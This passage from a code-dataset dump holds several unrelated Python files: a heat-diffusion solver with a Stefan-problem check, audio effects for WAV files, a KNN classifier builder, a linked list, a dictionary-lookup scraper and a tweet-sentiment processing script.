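The interior update in get_gradients is easiest to sanity-check in isolation. A minimal one-dimensional sketch of the same (k_i + k_j)*(T_j - T_i) stencil follows; the constants are illustrative stand-ins, and 567/T is an assumed ac/T-style conductivity, not necessarily the model's actual law:

import numpy as np

T = np.linspace(100.0, 273.0, 10)        # K
k = 567.0 / T                            # assumed ac/T-style conductivity
dz, dt, rhoc = 1.0, 10.0, 1.9e6          # illustrative grid/material values
Tz = dt / (2 * rhoc * dz ** 2) * ((k[1:-1] + k[2:]) * (T[2:] - T[1:-1])
                                  - (k[1:-1] + k[:-2]) * (T[1:-1] - T[:-2]))
print(T[1:-1] + Tz)                      # one explicit update of the interior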
chosen options\n\t\t\tn0 : int\n\t\t\t\tuse if not starting simulation from nt=0, generally used for restarting a simulation (see\n\t\t\t\trestart_simulation.py)\n\n\t\tUsage:\n\t\t\tRun simulation for 1000 time steps with dt = 300 s\n\t\t\t\tmodel.solve_heat(nt=1000, dt=300)\n\t\t\"\"\"\n\t\tself.dt = dt\n\t\tstart_time = _timer_.clock()\n\t\tself.num_iter = []\n\t\tif print_opts: self.print_all_options(nt)\n\n\t\tfor n in range(n0, n0 + nt):\n\t\t\tTErr, phiErr = np.inf, np.inf\n\t\t\tT_last, phi_last = self.T.copy(), self.phi.copy()\n\t\t\tk_last, rhoc_last = self.k.copy(), self.rhoc.copy()\n\t\t\titer_k = 0\n\t\t\twhile (TErr > self.Ttol and phiErr > self.phitol):\n\n\t\t\t\tTx, Tz = self.get_gradients(T_last)\n\t\t\t\tself.update_liquid_fraction(phi_last=phi_last)\n\t\t\t\tif self.issalt: self.saturated = self.update_salinity(phi_last=phi_last)\n\t\t\t\tself.update_volume_averages()\n\t\t\t\tself.Q = self.update_sources_sinks(phi_last=phi_last, T_last=T_last)\n\n\t\t\t\tself.T[1:-1, 1:-1] = T_last[1:-1, 1:-1] + Tx + Tz\n\t\t\t\tself.T += self.Q * self.dt / rhoc_last\n\n\t\t\t\tself.apply_boundary_conditions(T_last, k_last, rhoc_last)\n\n\t\t\t\tTErr = (abs(self.T[1:-1, 1:-1] - T_last[1:-1, 1:-1])).max()\n\t\t\t\tphiErr = (abs(self.phi[1:-1, 1:-1] - phi_last[1:-1, 1:-1])).max()\n\n\t\t\t\t# kill statement when parameters won't allow solution to converge\n\t\t\t\tif iter_k > 2000:\n\t\t\t\t\traise Exception('solution not converging')\n\n\t\t\t\titer_k += 1\n\t\t\t\tT_last, phi_last = self.T.copy(), self.phi.copy()\n\t\t\t\tk_last, rhoc_last = self.k.copy(), self.rhoc.copy()\n\t\t\t# outputs here\n\t\t\tself.num_iter.append(iter_k)\n\t\t\tself.model_time += self.dt\n\n\t\t\ttry: # save outputs\n\t\t\t\tself.outputs.get_results(self, n=n)\n\t\t\t# this makes the runs incredibly slow and is really not super useful, but here if needed\n\t\t\t# save_data(self, 'model_runID{}.pkl'.format(self.outputs.tmp_data_file_name.split('runID')[1]),\n\t\t\t# self.outputs.tmp_data_directory, final=0)\n\t\t\texcept AttributeError: # no outputs chosen\n\t\t\t\tpass\n\n\t\t\tif self.freezestop: # stop if no liquid remains\n\t\t\t\tif (self.phi[self.geom] == 0).all():\n\t\t\t\t\tprint('intrusion frozen at {0:0.04f}s'.format(self.model_time))\n\t\t\t\t\tself.run_time = _timer_.clock() - start_time\n\t\t\t\t\treturn self.model_time\n\n\t\t# del T_last, phi_last, Tx, Tz, iter_k, TErr, phiErr\n\n\t\tself.run_time = _timer_.clock() - start_time\n\n\tclass stefan:\n\t\t\"\"\"\n\t\tAnalytical two-phase heat diffusion problem for comparison with model results.\n\t\t(See https://en.wikipedia.org/wiki/Stefan_problem)\n\t\t\"\"\"\n\n\t\tdef solution(self, t, Ti, Tw=273.15):\n\t\t\t\"\"\"\n\t\t\tAnalytical solution to the two-phase Stefan Problem for freezing\n\t\t\tParameters:\n\t\t\t\tt : float\n\t\t\t\t\ttime, s\n\t\t\t\tTi : float\n\t\t\t\t\ttemperature of solid ice, K\n\t\t\t\tTw : float\n\t\t\t\t\ttemperature of liquid (generally at freezing temperature), K\n\t\t\tReturns:\n\t\t\t\tstefan.zm : float\n\t\t\t\t\tmelting/freezing front position at time t\n\t\t\t\tstefan.zm_func : function object\n\t\t\t\t\tmelting/freezing front position as a function of time\n\t\t\t\t\t\tUsage: t = array(0, 1e6) # s; zm = stefan.zm_func(t)\n\t\t\t\tstefan.zm_const : float\n\t\t\t\t\tconstant for the melting/freezing front position, i.e. 
2 * lam * sqrt(kappa)\n\t\t\t\tstefan.zi : array\n\t\t\t\t\tarray of position values from 0 to the melting/freezing front problem (0 < z < zm), for use with\n\t\t\t\t\tstefan.T\n\t\t\t\tstefan.Ti : array\n\t\t\t\t\ttemperature profile of ice (Ti) at time t along position z\n\t\t\t\tstefan.zw : array\n\t\t\t\t\tarray of position values from the freezing front position zm to the domain size (zm < z < Lz)\n\t\t\t\tstefan.Tw : array\n\t\t\t\t\ttemperature profile of water (Tw) at time t along position z\n\n\t\t\tUsage:\n\t\t\t\t\tmodel.stefan.solution(model, t=1e6, Ti=100, Tw=273.15)\n\t\t\t\"\"\"\n\t\t\t# ice properties are constant\n\t\t\tKi = self.constants.ki / (self.constants.rho_i * self.constants.cp_i)\n\t\t\tKw = self.constants.kw / (self.constants.rho_w * self.constants.cp_w)\n\t\t\tv = np.sqrt(Ki / Kw)\n\t\t\tSti = self.constants.cp_i * (self.constants.Tm - Ti) / self.constants.Lf\n\t\t\tStw = self.constants.cp_w * (Tw - self.constants.Tm) / self.constants.Lf\n\n\t\t\tfunc = lambda x: Sti / (np.exp(x ** 2) * erf(x)) \\\n\t\t\t - v * self.constants.kw * self.constants.cp_i * Stw \\\n\t\t\t / (self.constants.ki * self.constants.cp_w * erfc(v * x) * np.exp(x ** 2 * v ** 2)) \\\n\t\t\t - x * np.sqrt(np.pi)\n\t\t\tlam = optimize.root(func, 1)['x'][0]\n\n\t\t\tself.stefan.zm_const = 2 * lam * np.sqrt(Ki)\n\t\t\tself.stefan.zm = self.stefan.zm_const * np.sqrt(t)\n\t\t\tdef zm_func(t):\n\t\t\t\treturn 2 * lam * np.sqrt(Ki * t)\n\t\t\tself.stefan.zm_func = zm_func\n\t\t\tself.stefan.zi = np.linspace(0, self.stefan.zm, int(self.stefan.zm / self.dz))\n\t\t\tself.stefan.Ti = Ti + (self.constants.Tm - Ti) * erf(self.stefan.zi / np.sqrt(4 * Ki * t)) / erf(lam)\n\t\t\tself.stefan.zw = np.linspace(self.stefan.zm, self.Lz, int((self.Lz - self.stefan.zm) / self.dz))\n\t\t\tself.stefan.Tw = Tw - (Tw - self.constants.Tm) * erfc(self.stefan.zw / np.sqrt(4 * Kw * t)) / erfc(v * lam)\n\n\t\tdef compare(self, dt, stop=0.9):\n\t\t\t\"\"\"\n\t\t\tRuns a simulation of the Stefan problem to ensure discretization is correct\n\t\t\tParameters:\n\t\t\t\tdt : float\n\t\t\t\t\ttime step, s\n\t\t\t\tstop : float\n\t\t\t\t\tpercent of domain that is melted/frozen at which to stop the simulation\n\t\t\tUsage:\n\t\t\t\tmodel.stefan.compare(0.1, stop=0.5)\n\t\t\t\"\"\"\n\t\t\tself.dt = dt\n\t\t\tself.model_time = 0\n\t\t\tself.set_boundaryconditions(top=True, bottom=True, sides='NoFlux')\n\t\t\tself.outputs.get_results(self, n=0)\n\t\t\tn = 1\n\t\t\tfflast = 0\n\t\t\tself.num_iter = []\n\t\t\ttmp = np.where(self.phi > 0)\n\t\t\tff = min(tmp[0]) * self.dz\n\t\t\tstrt = _timer_.time()\n\t\t\twhile ff < stop * self.Lz:\n\t\t\t\tTErr, phiErr = np.inf, np.inf\n\t\t\t\tT_last, phi_last = self.T.copy(), self.phi.copy()\n\t\t\t\tk_last, rhoc_last = self.k.copy(), self.rhoc.copy()\n\t\t\t\titer_k = 0\n\t\t\t\twhile (TErr > self.Ttol and phiErr > self.phitol):\n\n\t\t\t\t\tTx, Tz = self.get_gradients(T_last)\n\t\t\t\t\tself.update_liquid_fraction(phi_last=phi_last)\n\t\t\t\t\tself.update_volume_averages()\n\t\t\t\t\tself.Q = self.update_sources_sinks(phi_last=phi_last, T_last=T_last)\n\n\t\t\t\t\tself.T[1:-1, 1:-1] = T_last[1:-1, 1:-1] + Tx + Tz\n\t\t\t\t\tself.T += self.Q * self.dt / rhoc_last\n\n\t\t\t\t\tself.apply_boundary_conditions(T_last, k_last, rhoc_last)\n\n\t\t\t\t\tTErr = (abs(self.T[1:-1, 1:-1] - T_last[1:-1, 1:-1])).max()\n\t\t\t\t\tphiErr = (abs(self.phi[1:-1, 1:-1] - phi_last[1:-1, 1:-1])).max()\n\n\t\t\t\t\t# kill statement when parameters won't allow solution to converge\n\t\t\t\t\tif iter_k > 
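The transcendental equation solved for lam above can be exercised outside the class. A standalone sketch, assuming generic ice/water constants (the model's actual self.constants values may differ):

import numpy as np
from scipy.special import erf, erfc
from scipy import optimize

ki, kw = 2.2, 0.56                  # W/m/K, ice/water (assumed)
rhoi, rhow = 917.0, 1000.0          # kg/m^3
cpi, cpw = 2100.0, 4200.0           # J/kg/K
Lf, Tm = 3.34e5, 273.15
Ti, Tw = 100.0, 273.15

Ki, Kw = ki / (rhoi * cpi), kw / (rhow * cpw)
v = np.sqrt(Ki / Kw)
Sti = cpi * (Tm - Ti) / Lf          # Stefan numbers for each phase
Stw = cpw * (Tw - Tm) / Lf
func = lambda x: (Sti / (np.exp(x ** 2) * erf(x))
                  - v * kw * cpi * Stw / (ki * cpw * erfc(v * x) * np.exp(x ** 2 * v ** 2))
                  - x * np.sqrt(np.pi))
lam = optimize.root(func, 1)['x'][0]
zm = lambda t: 2 * lam * np.sqrt(Ki * t)   # freezing-front depth, m
print(lam, zm(3.15e7))                     # front position after ~1 yr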
1000:\n\t\t\t\t\t\traise Exception('solution not converging')\n\n\t\t\t\t\titer_k += 1\n\t\t\t\t\tT_last, phi_last = self.T.copy(), self.phi.copy()\n\t\t\t\t\tk_last, rhoc_last = self.k.copy(), self.rhoc.copy()\n\n\t\t\t\t# outputs here\n\t\t\t\tself.outputs.get_results(self, n=n)\n\t\t\t\tself.model_time += self.dt\n\t\t\t\tself.num_iter.append(iter_k)\n\n\t\t\t\tn += 1\n\t\t\t\ttmp = np.where(self.phi == 0)\n\t\t\t\tff = max(tmp[0]) * self.dz\n\t\t\t\tif ff / self.Lz in [.10, .20, .30, .40, .50, .60, .70, .80, .90]:\n\t\t\t\t\tif ff != fflast: print('\\t {}% frozen at {}s'.format(ff / self.Lz * 100, self.model_time))\n\t\t\t\t\tfflast = ff\n\t\t\tself.run_time = _timer_.time() - strt\n\t\t\tself.stefan.solution(self, t=n * self.dt, Ti=self.Tsurf, Tw=self.Tbot)\n","sub_path":"HeatSolver.py","file_name":"HeatSolver.py","file_ext":"py","file_size_in_byte":31371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"403638132","text":"import numpy as np\n\nbase = 'queries-ca-restaurants-2'\ninfile = base + '.csv'\noutfile = base + '_extended.csv'\ninfile_len = 6992\n\nscale = 0.5\ntotal_points = 1000000000 # 1 billion queries\npoints_per_node = int(np.ceil(total_points / infile_len))\nprint(points_per_node, points_per_node * infile_len)\ngauss_x = np.random.normal(0, scale, size=points_per_node)\ngauss_y = np.random.normal(0, scale, size=points_per_node)\npoints = list(zip(gauss_x, gauss_y))\n\ninf = open(infile, 'r')\nlines = [l.strip().split(',') for l in inf.readlines()]\nnodes = [(float(x[0]), float(x[1])) for x in lines]\n\nwith open(outfile, 'w') as nf:\n for n in nodes:\n for p in points:\n nf.write('%f,%f\\n' % (p[0] + n[0], p[1] + n[1]))\n","sub_path":"data/kdtree/expand-nodes.py","file_name":"expand-nodes.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"324669909","text":"import numpy as np\nimport wavio\nimport simpleaudio as sa\n\n\nclass WavFile:\n \"\"\"Class representing a .WAV file\n\n file: path to the .wav file\n \"\"\"\n def __init__(self, file = \"\"):\n \"\"\"Read the audio file and save all the important data\"\"\"\n\n self.fileName = file\n \n if file != \"\":\n self.wav = wavio.read(file)\n\n # framerate\n self.fs = self.wav.rate\n\n # number of bytes per sample\n self.bytes = self.wav.sampwidth\n\n # track data\n self.data = np.array(self.wav.data)\n\n #track data as float\n self.floatData = int_to_float(self.data, self.bytes)\n\n # dimensions of the data which is (nSamples, nChannels)\n # nSamples: number of samples in a file\n # nChannels: number of channels, 1 - mono, 2 - stereo\n (self.nSamples, self.nChannels) = np.shape(self.data)\n\n # length of a file in seconds\n self.length = self.nSamples / self.fs\n\n \n def get_track_name(self):\n \"\"\"Return a track name 'name.wav' \"\"\"\n lastSlashIndex = self.fileName.rfind('/')\n\n return self.fileName[lastSlashIndex + 1:]\n\n\n def get_track_length(self):\n \"\"\"Return a string in a format 'hh/mm/ss' \"\"\"\n h = int(self.length / 3600)\n m = int((self.length - h * 3600) / 60)\n s = int(self.length - h * 3600 - m * 60)\n\n hStr, mStr, sStr = \"\", \"\", \"\"\n\n if h == 0:\n hStr = \"00\"\n elif h > 9:\n hStr = str(h)\n else:\n hStr = \"0\"+str(h)\n\n if m == 0:\n mStr = \"00\"\n elif m > 9:\n mStr = str(m)\n else:\n mStr = \"0\"+str(m)\n\n if s == 0:\n sStr = \"00\"\n elif s > 9:\n sStr = str(s)\n else:\n sStr = \"0\"+str(s)\n\n time = hStr + \":\" + mStr + \":\" + 
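The nested write loop in expand-nodes.py above can also be expressed with NumPy broadcasting, one vectorized write per node. A small sketch with made-up node coordinates and an illustrative output filename:

import numpy as np

nodes = np.array([[1.0, 2.0], [3.0, 4.0]])
cloud = np.random.normal(0, 0.5, size=(1000, 2))   # one Gaussian cloud, reused
with open('expanded.csv', 'w') as out:
    for n in nodes:
        np.savetxt(out, cloud + n, fmt='%f', delimiter=',')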
sStr\n        return time\n\n\n    def play(self):\n        \"\"\"Play the sound\"\"\"\n        play = sa.play_buffer(self.data, self.nChannels, self.bytes, self.fs)\n\n\n    def stop(self):\n        \"\"\"Stop all sounds\"\"\"\n        sa.stop_all()\n\n\n    def write_to_file(self, file):\n        \"\"\"Save file in a .wav format\"\"\"\n        wavio.write(file, self.data, self.fs, scale = 'none', sampwidth = self.bytes)\n\n    \n    def echo_effect(self, delay, decayFactor ):\n        \"\"\"Add echo effect\n\n        delay[s]: >0.0\n        decayFactor: 0-1 \n        \"\"\"\n        # convert delay in seconds to delay in number of samples\n        delaySamples = int(delay * self.fs)\n\n        tempData = np.empty(np.shape(self.floatData), dtype = float)\n\n        for i in range(0, self.nSamples):\n            \n            if i >= delaySamples:\n                tempData[i] = self.floatData[i] + decayFactor * self.floatData[i - delaySamples]\n            else:\n                tempData[i] = self.floatData[i]\n\n        self.floatData = tempData\n        self.data = float_to_int16(tempData)\n\n\n    def distortion_effect(self, inputGain):\n        \"\"\"Add distortion effect (implemented with an exponential function)\n\n        inputGain: 2-20\n        \"\"\" \n\n        tempData = np.empty(np.shape(self.floatData), dtype = float)\n\n        for i in range(self.nSamples):\n            \n            sign = np.sign(self.floatData[i])\n            tempData[i] = sign * (1 - np.exp(-np.abs(self.floatData[i] * inputGain)))\n\n        self.floatData = tempData\n        self.data = float_to_int16(tempData)\n\n\n    def tremolo_effect(self, depth, fLFO):\n        \"\"\"Add tremolo effect\n        \n        depth: 0-1\n        fLFO(Hz): 2-10\n        \"\"\"\n\n        fNorm = 2 * np.pi * fLFO / self.fs\n\n        tempData = np.empty(np.shape(self.floatData), dtype = float)\n\n        for i in range(0, self.nSamples):\n            tempData[i] = self.floatData[i] * (1 + depth * np.cos(fNorm * i))\n\n        self.floatData = tempData\n        self.data = float_to_int16(tempData)\n\n\n    def flanging_effect(self, delay, oscRange, fSweep):\n        \"\"\"Add flanging effect\n        \n        delay(ms): 0.025-2\n        oscRange: 10-200\n        fSweep(Hz): 0.25-2\n        \"\"\"\n        \n        delaySamples = round(delay / 1000 * self.fs)\n        \n        fNorm = 2 * np.pi * fSweep/self.fs\n\n        tempData = np.empty(np.shape(self.floatData), dtype = float)\n\n        for i in range(0, self.nSamples-delaySamples-oscRange):\n            \n            tempData[i] = self.floatData[i] + self.floatData[i+delaySamples+int(round(oscRange*np.sin(fNorm * i)))]\n\n        self.floatData = tempData\n        self.data = float_to_int16(tempData)\n\n\n\ndef int_to_float(intArray, nBytes):\n    \"\"\"Convert an int array to a float array\"\"\"\n    \n    floatArray = intArray / 2 ** (8 * nBytes - 1)\n\n    return floatArray\n\n\ndef float_to_int16(floatArray):\n    \"\"\"Convert a float array to an int16 array\"\"\"\n\n    arrayMax = np.amax(floatArray)\n    arrayMin = np.amin(floatArray)\n    scaleFactor = arrayMax if arrayMax >= np.abs(arrayMin) else np.abs(arrayMin)\n\n    intArray = (floatArray / scaleFactor * 2**15).astype(np.int16)\n\n    return intArray","sub_path":"WavUtils.py","file_name":"WavUtils.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"60667325","text":"import json\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nfrom pandas.core.common import SettingWithCopyWarning\nfrom sklearn.neighbors import KNeighborsClassifier\n\nfrom ImageFeaturesDto import ImageFeaturesDto\nfrom ResourceProviders.TrainPathProvider import TrainPathProvider\nfrom TrainMarksProvider import TrainMarksProvider\n\nwarnings.simplefilter(action=\"ignore\", 
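The per-sample Python loops in the effects above are slow in interpreted code; the echo, for instance, reduces to a single slice addition. A sketch, assuming a mono float signal and delay > 0:

import numpy as np

def echo(x, fs, delay, decay):
    # y[i] = x[i] + decay * x[i - d], done with one slice instead of a loop
    d = int(delay * fs)
    y = x.copy()
    y[d:] += decay * x[:-d]
    return y

x = np.random.randn(44100).astype(np.float32)
print(echo(x, 44100, 0.25, 0.5).shape)   # (44100,)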
category=SettingWithCopyWarning)\n\n\nclass ClassifireCreator:\n    def __init__(self):\n        self.train_marks_provider = TrainMarksProvider()\n        self.path_provider = TrainPathProvider()\n        self.search_space = self.load_search_space()\n\n    def load_search_space(self):\n        path = self.path_provider.get_train_features_path()\n        with open(path) as file_in:\n            dtos = []\n            for line in file_in:\n                featuresDto = ImageFeaturesDto(**json.loads(line))\n                dtos.append(featuresDto)\n            return pd.DataFrame(dtos)\n\n    def create_search_space_with_rank(self, rank):\n        allowed = set(self.train_marks_provider._get_by_rank(rank))\n        mask = self.search_space['image_number'].isin(allowed)\n\n        df = self.search_space[mask]\n        df['vector'] = df.apply(lambda r: np.array(r['vector']), axis=1)\n        df['labels'] = df.apply(lambda r: r['labels'], axis=1)\n\n        features = np.vstack(df['vector'].values)\n        labels = np.vstack(np.ravel(df['labels'].values))\n        return features, labels\n\n    def create_classifier(self, features, labels):\n        clf = KNeighborsClassifier(n_neighbors=10, weights='distance', algorithm='ball_tree', n_jobs=-1)\n        clf.fit(features, labels)\n        return clf\n\n    def create_full_classifier(self):\n        features, labels = self.create_search_space_with_rank(1)\n        classifire = self.create_classifier(features, labels)\n        for rank in range(2, 6):\n            many_label_features, many_label_labels = self.create_search_space_with_rank(rank)\n            one_label_features, one_label_labels = self.reformat_non_one_lable_sample_to_one_lable(classifire, labels,\n                                                                                                   many_label_features,\n                                                                                                   many_label_labels)\n            print((features.shape, one_label_features.shape, labels.shape, one_label_labels.shape))\n            features = np.concatenate((features, one_label_features))\n            labels = np.concatenate((labels, one_label_labels))\n            classifire = self.create_classifier(features, labels)\n            print(f'rank {rank} done')\n\n        features_file = TrainPathProvider().get_search_space_features_path()\n        with open(features_file, 'wb') as f:\n            np.save(f, features)\n\n        labels_file = TrainPathProvider().get_search_space_labels_path()\n        with open(labels_file, 'wb') as f:\n            np.save(f, labels)\n\n    def _reformat_non_one_lable_sample_to_one_lable(self, classifier, classifier_labels, features, labels):\n        distances, indices = classifier.kneighbors(features, n_neighbors=10)\n        kneighbours = classifier_labels[\n            indices]  # this should yield a (k=10, 1) array of candidate labels in order of increasing distance\n        for i, feature_neighbours in enumerate(kneighbours):\n            for vector in feature_neighbours:\n                label = vector[0]\n                if label in labels[i]:\n                    yield features[i], label\n                    break\n\n    def reformat_non_one_lable_sample_to_one_lable(self, classifier, classifier_labels, features, labels):\n        res = np.asarray(\n            list(self._reformat_non_one_lable_sample_to_one_lable(classifier, classifier_labels, features, labels)))\n        features, labels = np.vstack(np.ravel(res[:, 0])), res[:, 1].reshape(-1, 1)\n        return features, labels\n","sub_path":"ClassifireCreator.py","file_name":"ClassifireCreator.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"164404988","text":"import sys\nimport time\nfrom urllib.request import urlopen\nimport bs4\n\nURL = 'https://eow.alc.co.jp/search?q={}'\n\ndef main(word):\n    resp = urlopen(URL.format(word))\n    soup = bs4.BeautifulSoup(resp, 'html.parser')\n    try:\n        attr = ''.join(soup.find('span', class_='attr').strings)\n    except AttributeError:\n        attr = 'Failed...(T_T)'\n    return attr\n\n\nif __name__ == '__main__':\n    for i, word in 
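The rank-1 fit plus kneighbors lookup pattern used by ClassifireCreator can be reproduced on toy data. A sketch with illustrative shapes and random labels:

import numpy as np
from sklearn.neighbors import KNeighborsClassifier

X = np.random.rand(50, 8)
y = np.random.randint(0, 3, size=50)
clf = KNeighborsClassifier(n_neighbors=10, weights='distance',
                           algorithm='ball_tree', n_jobs=-1)
clf.fit(X, y)
dist, idx = clf.kneighbors(np.random.rand(4, 8), n_neighbors=10)
print(y[idx])   # candidate labels ordered by increasing distance, as above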
enumerate(sys.argv[1:], 1):\n        print(main(word))\n        if i + 1 < len(sys.argv):\n            time.sleep(5)\n    \n","sub_path":"Accent/alc.py","file_name":"alc.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"164762144","text":"import random\n\n\nclass Node(object):\n    \"\"\"Node\"\"\"\n    def __init__(self, elem):\n        self.elem = elem\n        self.next = None\n\n\nclass LinkList(object):\n    def __init__(self, node=None):\n        self.__head = node\n\n    def get_elem(self, i):\n        \"\"\"Return the element at position i\"\"\"\n        p = self.__head\n        j = 1\n        while p and j < i:\n            p = p.next\n            j += 1\n        assert p and j <= i, \"There is no node at %d\" % i\n        return p.elem\n\n    def get_head(self):\n        \"\"\"Return the head node\"\"\"\n        return self.__head\n\n    def get_tail(self):\n        \"\"\"Return the tail node\"\"\"\n        p = self.get_head()\n        if p is None:\n            return None\n        while p.next:\n            p = p.next\n        return p\n\n    def get_length(self):\n        \"\"\"Get the length of the linked list\"\"\"\n        count = 0\n        p = self.__head\n        while p:\n            p = p.next\n            count += 1\n        return count\n\n    def is_empty(self):\n        \"\"\"Check whether the list is empty\"\"\"\n        return self.__head is None\n\n    def add(self, e):\n        \"\"\"Add an element at the head of the list\"\"\"\n        n = Node(e)\n        p = self.__head\n        n.next = p\n        self.__head = n\n\n    def append(self, e):\n        \"\"\"Append an element at the tail of the list\"\"\"\n        n = Node(e)\n        p = self.__head\n        if self.__head:\n            while p.next:\n                p = p.next\n            p.next = n\n        else:\n            self.__head = n\n\n    def list_insert(self, i, e):\n        \"\"\"Insert element e after position i\"\"\"\n        j = 1\n        p = self.__head\n        if i == 0:\n            self.add(e)\n            return True\n        if i >= self.get_length():\n            self.append(e)\n            return True\n        else:\n            while p and j < i:\n                p = p.next\n                j += 1\n            n = Node(e)\n            n.next = p.next\n            p.next = n\n            return True\n\n    def travel(self):\n        \"\"\"Traverse the whole list\"\"\"\n        p = self.__head\n        li = []\n        while p:\n            li.append(p.elem)\n            p = p.next\n        print(li)\n        return True\n\n    def list_delete(self, i):\n        \"\"\"Delete the element at position i\"\"\"\n        assert 0 < i <= self.get_length(), \"There is no node at %d\" % i\n        p = self.__head\n        pre = None\n        j = 1\n        if i == 1:\n            self.__head = p.next\n        else:\n            while p and j < i:\n                pre = p\n                p = p.next\n                j += 1\n            if p.next:\n                pre.next = p.next\n            else:\n                pre.next = None\n        return True\n\n    def create_list_head(self, num):\n        \"\"\"Randomly generate a linked list of length num\"\"\"\n        for i in range(0, num):\n            e = random.randint(0, 100)\n            n = Node(e)\n            head = self.get_head()\n            n.next = head\n            self.__head = n\n\n\n","sub_path":"Linked_List.py","file_name":"Linked_List.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"286551332","text":"\n'''\ndata processing: starting with reading filenames for loading\n'''\n\nfrom glob import glob \nfrom datetime import datetime\nimport numpy as np\nimport pandas as pd\nimport time\n\nfrom processing_helpers import * \nfrom summarizing_helpers import *\nfrom city_data_helpers import * \n\ndata_source = '/data/'\ndata_dest = '/data/app_data/'\n\n\n\ndef process_new_data():\n\n    '''\n    Stage 1: process raw data into several datasets \n\n    '''\n\n    current_time = datetime.utcnow() + pd.DateOffset(hours=-6)\n    # impute date if there is too much new data (more than one day of data) to process \n    # current_time = pd.to_datetime('2020-08-17 23:59')\n\n    current_time_s = current_time.strftime('%Y-%m-%d %H:%M:%S')\n    current_time_s\n\n    # read file names\n    files_1 = glob(data_source + \"BLM_tweet_original_*/*/*/*/*\")\n    files_2 = glob(data_source + \"BLM_tweet_retweet_*/*/*/*/*\")\n\n    # use the following when imputed date is used \n    # files_1 = keep_recent_files2(glob(data_source + \"BLM_tweet_original_*/*/*/*/*\"),\n    # 
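A quick exercise of the LinkList class above (assumes the class is in scope; values are arbitrary):

ll = LinkList()
for e in [3, 1, 4]:
    ll.append(e)
ll.list_insert(2, 99)    # insert 99 after position 2 -> [3, 1, 99, 4]
ll.travel()
ll.list_delete(1)        # drop the head -> [1, 99, 4]
ll.travel()
print(ll.get_length())   # 3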
current_time + pd.Timedelta(6, unit='h'), days=2, no_newer=True)\n # files_2 = keep_recent_files2(glob(data_source + \"BLM_tweet_retweet_*/*/*/*/*\"),\n # current_time + pd.Timedelta(6, unit='h'), days=2, no_newer=True)\n\n\n\n processing_begin_logs = pd.read_csv(data_dest + 'data_processing_log/processing_begin.csv')\n processing_begin_logs.timestamp = pd.to_datetime(processing_begin_logs.timestamp)\n processing_begin_logs_h = [time.floor(\"h\") for time in processing_begin_logs.timestamp]\n\n current_time_s = pd.to_datetime(current_time_s)\n current_time_h = current_time_s.floor(\"h\")\n\n # flag for updating current data if it is not processed in the same clock hour\n update_current_data = current_time_h not in processing_begin_logs_h\n # ! overwrite for testing\n update_current_data = True\n\n print('update_current_data:' , update_current_data)\n\n\n # initial file creation\n # pd.DataFrame([current_time_s], columns = {'timestamp'}).to_csv('data_processing_log/processing_begin.csv', index=False)\n\n # append to file log line_terminator='\\n')\n with open(data_dest + 'data_processing_log/processing_begin.csv','a') as fd:\n fd.write('\\n'+str(current_time_s))\n\n\n # read previous filenames\n existing_files_1 = pd.read_csv(data_dest + 'data_filenames/files_read_BLM_tweet_original.csv')\n existing_files_2 = pd.read_csv(data_dest + 'data_filenames/files_read_BLM_tweet_retweet.csv')\n\n # get new file names \n new_files_1 = [file for file in files_1 if file.split(data_source)[1] not in np.array(existing_files_1.name)]\n new_files_2 = [file for file in files_2 if file.split(data_source)[1] not in np.array(existing_files_2.name)]\n\n ## set a limit when there are too much data to process\n # if len(new_files_1)>50:\n # new_files_1 = new_files_1[:50] \n\n\n print('original tweet files:')\n [ print(file) for file in new_files_1]\n print('retweet files:')\n [ print(file) for file in new_files_2]\n\n\n new_original = len(new_files_1)>0\n new_retweet = len(new_files_2)>0\n\n\n # get new data \n ori = new_tw_data(new_files_1, type='original')\n rt = new_tw_data(new_files_2, type='retweet')\n\n\n try:\n print('Going to process {} records of original tweets and {} records of retweets.'.format(len(ori.df), len(rt.df)))\n \n except:\n try: print('Going to process {} records of original tweets.'.format(len(ori.df)))\n except: \n try: print('Going to process {} records of retweets.'.format(len(rt.df)))\n except: print('No new data to process at this time.')\n\n\n ori.assign_sentiments()\n ori.assign_emotions()\n ori.count_words()\n\n rt.assign_sentiments()\n rt.assign_emotions()\n rt.count_words()\n\n # bgn_timespan = ori.df.created_at.min() if new_original else current_time_s\n\n # load stats from cumulative retweet to match with new data\n ref_sentiments = pd.read_csv(data_dest + \n 'data_cumulative/retweet/2020_all_sentiments.csv')\n ref_emotions = pd.read_csv(data_dest + \n 'data_cumulative/retweet/2020_all_emotions.csv')\n ref_words = pd.read_json(data_dest + \n 'data_cumulative/retweet/2020_all_words.json', orient='records', lines=True)\n\n fix_datetime(ref_sentiments)\n fix_datetime(ref_emotions)\n fix_datetime(ref_words)\n fix_token_counter(ref_words)\n\n # combine new stat data and matched data from cumulative retweet data \n if new_original:\n new_sentiments = merge_datasets(or_df = ori.df, \n or_data = ori.df_sentiments, \n ref_data = ref_sentiments)\n\n new_emotions = merge_datasets(or_df = ori.df, \n or_data = ori.df_top_emotions, \n ref_data = ref_emotions)\n\n new_words = 
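The new-file diff above tests membership against np.array(...), which scans the whole array once per file; a set gives O(1) lookups. A self-contained sketch of the same pattern with dummy names (the real column is 'name'):

existing = {'a.json', 'b.json'}           # e.g. set(existing_files_1.name)
files = ['/data/a.json', '/data/c.json']
new_files = [f for f in files if f.split('/data/')[1] not in existing]
print(new_files)                          # ['/data/c.json']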
